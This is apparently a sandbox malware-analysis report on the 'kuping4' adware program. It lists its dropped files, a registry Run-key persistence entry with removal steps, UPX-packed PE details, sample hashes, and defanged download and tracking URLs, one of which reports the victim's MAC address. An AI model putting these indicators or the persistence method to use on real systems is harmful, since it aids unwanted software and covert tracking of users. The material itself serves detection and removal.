C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\seach-btn.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\FeedbackDlgConfig\MainFeedbackDlg.ini (879 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\mail.png (263 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\Screen-saver.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\tag_focus.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\WebContro.ini (529 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\logo.png (970 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\function.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\install_icon.png (971 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\focus.png (199 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\drop-down.png (338 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\add-app-bg_01.png (974 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\sina_logo.png (638 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\app.png (987 bytes)
C:\kuping4\TempDownLoad\TagInfo\TagVersion.ini (29 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\MainSkin.ini (3 bytes)
C:\kuping4\Uninstall\skinConfig_un\skinconfig.ini (85 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\album.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\My-collection.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\begin.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\title-Modify-head.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\gray.png (313 bytes)
C:\kuping4\QuickenFunctionConfig\deskIco\status.ini (16 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\img_01.png (588 bytes)
C:\kuping4\Appsoftconfig\image\play.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\application\iconlist_bg.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\head120.png (1372 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\silder-fill.png (343 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\DownloadWebDlg\set-cancel.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\logo.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IconListEx\icon_focus.png (510 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-1.png (794 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\btn_known.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\bg.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\tailorBg.jpg (1764 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\cheak.png (564 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\logo.png (970 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\update.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\orange.png (327 bytes)
C:\kuping4\skinConfig\skinversion.ini (29 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\shuyeer.png (196 bytes)
C:\kuping4\Appsoftconfig\image\buttoncoculation.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ScreenSaverNavigation_Layer.ini (196 bytes)
C:\kuping4\Appsoftconfig\image\soft.xml (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\set_icon.png (782 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\upon.png (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\TongJICNZZ.dll (65 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateSkin.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPIRWXAZ\h[1].js (5 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\bg_wf.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\delete.png (486 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\popmenu.png (678 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\check-box_focus.png (991 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\My-share.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\focus-l.png (222 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\about\about.png (1176 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\m.png (3 bytes)
C:\kuping4\MSGBoxSkin\UI\warning.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\¡Ì.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\page2.png (106 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\sure.png (634 bytes)
C:\kuping4\UserBehaviorStatistics.dll (471 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list_theme.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\logo.png (584 bytes)
C:\kuping4\kp4_Mini.exe (157 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\AllApplication_Layer.ini (1 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\input.png (212 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\Label-input-box1.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\continue.png (382 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\delete.png (486 bytes)
C:\kuping4\uninstall.exe (2145 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IconListEx\add-m.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\recover.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\SepLine.png (99 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\skin_bg_01.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\updown.png (280 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\HomePageShow_Layer.ini (3 bytes)
C:\kuping4\Appsoftconfig\APPversion.ini (59 bytes)
C:\kuping4\MSGBoxSkin\UI\faild.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\refresh.png (1 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\seach.png (1 bytes)
C:\kuping4\Update\SkinResource\Exit.png (1 bytes)
C:\kuping4\Appsoftconfig\image\buttonplay.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateCheckPage.ini (261 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\loading2.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateInfoPage.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\MyBaoku.ini (3 bytes)
C:\kuping4\DeskTopPop.exe (1529 bytes)
C:\kuping4\Appsoftconfig\image\sou.png (196 bytes)
C:\kuping4\Update\SkinResource\IsNew.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\Boot-screen.png (196 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\close.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\DownloadWebDlg\scroll.png (410 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\mennu-bg.png (363 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\blue.png (90 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\min.png (338 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\cancel.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\collection.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\set.png (234 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\nextpage.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\BootScreenNavigation_Layer.ini (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\brown.png (286 bytes)
C:\kuping4\Update\SkinResource\BKStep1.png (902 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\icon.png (392 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SettingMenuDlgConfig\MainMenuDlgSkin.ini (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¿áÆÃÂÂ4\öÃâ€ÂØ¿áÆÃÂÂ4.lnk (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\progress.png (179 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\save.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SystemThemeNavigation_Layer.ini (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\pink.png (290 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\wallpaper.png (196 bytes)
C:\kuping4\MSGBoxSkin\UI\error.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMZG52N\21[1].gif (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\doc_plus_icon&16.png (264 bytes)
C:\kuping4\unrar.dll (824 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\down.png (161 bytes)
C:\kuping4\Update\SkinResource\ProgressBar.png (984 bytes)
C:\kuping4\QuickenFunctionConfig\deskIco\DeskIconConfig.xml (8 bytes)
C:\kuping4\KPMsgBoxDll.dll (2694 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\feedback_icon.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Silence-set_button.png (1 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\finish2.png (588 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\small.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\focus-2.png (200 bytes)
C:\kuping4\TempDownLoad\Home\11274.jpg (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\delete-button.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\WebPage.ini (594 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\list-bg.png (96 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\mouse.png (549 bytes)
C:\kuping4\skinConfig\skinconfig.ini (84 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Download-set.png (966 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Multi.png (998 bytes)
C:\kuping4\login.dll (2185 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\right_bg.png (194 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Application-Settings.png (953 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-share\bg.png (196 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\¿áÆÃÂÂ4.lnk (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\line_h.png (92 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\WebContrl_Layer.ini (775 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ImageLookDlgConfig\MainSkin.ini (129 bytes)
C:\kuping4\TongJICNZZ.dll (1333 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\application.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\scroll_down.png (982 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\black.png (316 bytes)
%Documents and Settings%\%current user%\Desktop\¿áÆÃÂÂ4.lnk (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\start.png (941 bytes)
C:\kuping4\dgmon.dll (471 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\Input-box.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\view-bg.png (509 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\fail.png (196 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\lijiuninstall.png (784 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Screening-bg2.png (102 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\Alert.png (1 bytes)
C:\kuping4\Appsoftconfig\image\Iebuttonlogo.png (196 bytes)
C:\kuping4\TempDownLoad\Home\home.xml (1764 bytes)
C:\kuping4\livability.dll (510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9LJNTUH\tongji_baidu[1].htm (295 bytes)
C:\kuping4\Update\SkinResource\Fnish.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\fail.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\WebContro.ini (617 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\show.png (413 bytes)
C:\kuping4\Kp_BootClr.exe (1137 bytes)
C:\kuping4\Repairer.exe (549 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\re.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateNormal.ini (641 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\backpage.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\white.png (283 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\bg_small.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\set_1.png (522 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kupingbg-03_03.png (980 bytes)
C:\kuping4\Appsoftconfig\image\cmd.png (196 bytes)
C:\kuping4\Update\SkinResource\Point.png (1 bytes)
C:\kuping4\BootStart.dll (157 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\cancel.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\add-app-bg_03.png (412 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\logo.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\about\delete.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\notice\Alert.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\App-manager.png (654 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\display_shadow.png (115 bytes)
C:\kuping4\Universal\UniversalCpaSkin.rar (1098 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\app-button.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\content.png (416 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\delete.png (486 bytes)
C:\kuping4\MSGBoxSkin\UI\infomation.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\mennu-bg2.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPIRWXAZ\stat[1].php (770 bytes)
C:\kuping4\Appsoftconfig\image\coculation.png (196 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\img.wallba[1].xml (266 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\cut_button-hand.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\headbg.png (556 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\DownloadWebImageDlg\MainSkin.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\My-resources.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\about.png (606 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\dan_xuan.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\bg_vein.png (268 bytes)
C:\kuping4\Appsoftconfig\button.xml (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\LocTween_Layer.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\login-btn.png (2 bytes)
C:\kuping4\Update\SkinResource\Cancel.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateNoticeDlg.ini (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\scroll_thumb.png (842 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT (8 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SeverTween_Layer.ini (1 bytes)
C:\kuping4\Update\SkinResource\BKStep2.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\screen.png (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMZG52N\h[2].js (12 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\tip.png (591 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\set.png (549 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\notchoose.png (879 bytes)
C:\kuping4\version.ini (44 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\red.png (318 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\scroll_up.png (927 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\head60.png (392 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\up.png (160 bytes)
C:\kuping4\SystemConfig\LocWallpaleXml.xml (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Software-update.png (998 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\loading.png (3 bytes)
C:\kuping4\Update\UpData.dll (2342 bytes)
C:\kuping4\Update\SkinResource\Update.png (196 bytes)
C:\kuping4\QuickenFunctionConfig\Setup\CpaConfig.xml (8 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\local.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\scroll_block.png (763 bytes)
C:\kuping4\IndividualCenter.dll (5389 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\list-bg2.png (2 bytes)
C:\kuping4\SkinCenter.dll (3635 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\myDownLoad.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ResourceNavigation_Layer.ini (974 bytes)
C:\kuping4\MSGBoxSkin\UI\yes_button.png (1 bytes)
C:\kuping4\Appsoftconfig\softtempfile\soft.xml (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IconListEx\iconlist_bg.png (314 bytes)
C:\kuping4\Appsoftconfig\image\buttonsou.png (196 bytes)
C:\kuping4\skinConfig\SkinSetting.xml (1 bytes)
C:\kuping4\MSGBoxSkin\UI\question.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\bkimg.png (429 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Directory-box_bg.png (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\installedSoftInfo.ini (1952 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-4.png (287 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\submit.png (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\81AVK52J\core[1].php (799 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\check-box.png (540 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\flowerpot.png (3 bytes)
C:\kuping4\Update\info.ini (18 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\doc_empty_icon&16.png (293 bytes)
C:\kuping4\Update\UDStatictical.dll (1882 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\choose.png (883 bytes)
C:\kuping4\TempDownLoad\TagInfo\list_xp.xml (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\finish-button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SettingMenuDlgConfig\ConventionalMenu_Layer.ini (1 bytes)
C:\kuping4\KPConfig.inf (3 bytes)
C:\kuping4\Uninstall\installedSoftInfo.ini (984 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kupingbg-02.png (588 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\share.png (472 bytes)
C:\kuping4\TempDownLoad\Home\11277.jpg (196 bytes)
C:\kuping4\SystemConfig\LocThemeXml.xml (416 bytes)
C:\kuping4\ThemeInstall.dll (863 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Screening-bg.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\caption-bg.png (417 bytes)
C:\kuping4\MSGBoxSkin\UI\bg_top.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\cheakskin\MainSkin.ini (1 bytes)
C:\kuping4\MSGBoxSkin\UI\cancel-button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\refresh.png (726 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\suspend.png (504 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\tempfile.tmp (184 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\apple.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\DesktopWallpaperNavigation_Layer.ini (196 bytes)
C:\kuping4\Update\SkinResource\PopupBox.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\tag.png (195 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\kankan.png (1725 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\delete.png (486 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\NoLogin_Layer.ini (941 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\use.png (196 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\bg_01.png (392 bytes)
C:\kuping4\TempDownLoad\SearchBuff.ini (23 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\tag-bg.png (350 bytes)
C:\kuping4\MSGBoxSkin\UI\no_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\purple.png (325 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\progress_frame.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\failure.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPIRWXAZ\h[2].js (12 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SettingMenuDlgConfig\DownLoadMenu_Layer.ini (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\min.png (338 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\xiezai.png (375 bytes)
C:\kuping4\TempDownLoad\Home\11278.jpg (588 bytes)
C:\kuping4\Update\SkinResource\Ok.png (196 bytes)
C:\kuping4\Update\SkinResource\FnishSmall.png (2 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\mennu_narrow.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\icon_focus.png (317 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\skin.png (629 bytes)
C:\kuping4\Update\Skin.ini (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\jindutiao1.png (99 bytes)
C:\kuping4\ExpandPackCheck.exe (1725 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\add-app-bg.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\icon.png (1764 bytes)
C:\kuping4\MSGBoxSkin\UI\ok_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\focus3.png (357 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\AboutDlgConfig\MainDlg.ini (1 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"kuping4" = "c:\kuping4\Kp_BootClr.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 430080 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 434176 | 339968 | 338944 | 5.47203 | 978d1656cdc8bd3ebe307efaa9932b8f |
| .rsrc | 774144 | 32768 | 30720 | 3.3286 | 14d2b030b36e6b403314b58937aaf593 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 4
88a9b3e31998982eea246b762564c443
b9a2d5732a753d35e5225b719e77099a
37bd3e78933db6863bf17a82eba47c5c
53af0782e080923bfcca86f1cbc7530d
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://d.union.kuping.cc/download.php/kuping_b_53390.exe | 222.186.60.27 |
| hxxp://youqian.baidu.com/download/bdBrowserSetup-5810-ftn_1000039714.exe | 115.239.211.50 |
| hxxp://tj.153624.com/report/ | 101.251.196.27 |
| hxxp://config.153624.com/Public/conf/c-lock/1/1_4_3_2_2/53390.xml | 222.186.60.10 |
| hxxp://config.153624.com/Public/tongji_baidu.html?ip=&mac=00-0C-29-64-A0-20&area=&channel_id=53390&install_way=1&soft_id=1&start_way=0&type=install&version=4.3.2.2 | 222.186.60.10 |
| hxxp://wallba.com.m.01cdn.com/Public/Configs/index.html?id=53390&class=silence | |
| hxxp://c.split.cnzz.com/stat.php?id=4793307&web_id=4793307 | |
| hxxp://hm.e.shifen.com/h.js?7e36c4d74dc16bfa27cd9aea154b5de5 | |
| hxxp://hm.e.shifen.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1024x768&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=185766198&si=7e36c4d74dc16bfa27cd9aea154b5de5&st=1&v=1.0.59&lv=1 | |
| hxxp://static.n.shifen.com/hmt/icon/21.gif | |
| hxxp://z3.cnzz.com/stat.htm?id=4793307&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=725810708-1402350084-&showp=1024x768&st=0&sin=&t=undefinedundefinedundefinedundefinedundefinedundefined&rnd=252340755 | |
| hxxp://c.split.cnzz.com/core.php?web_id=4793307&t=z | |
